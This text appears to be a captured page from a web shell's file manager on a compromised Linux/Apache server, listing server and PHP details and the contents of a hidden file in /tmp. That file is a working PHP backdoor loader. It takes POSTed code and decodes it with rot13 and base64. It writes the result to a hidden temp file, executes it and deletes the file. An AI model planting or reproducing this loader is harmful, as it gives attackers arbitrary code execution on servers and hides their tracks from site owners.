HEX
Server: Apache/2.4.62 (Unix) OpenSSL/1.0.2k-fips
System: Linux vmi1074390.contaboserver.net 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: aancarri (1361)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //tmp/_FdGrfqfMFcRWB
<?php $dirs=array_filter([sys_get_temp_dir(),"/tmp","/var/tmp",ini_get("upload_tmp_dir"),getenv("TEMP"),getenv("TMP"),getcwd()]);$c="<?php ".base64_decode(str_rot13($_POST["SR"]));foreach($dirs as $d){if(is_dir($d)&& is_writable($d)){$p="{$d}/.requests";if(file_put_contents($p,$c)){include $p;@unlink($p);exit;}}}die("!notwrtbl!");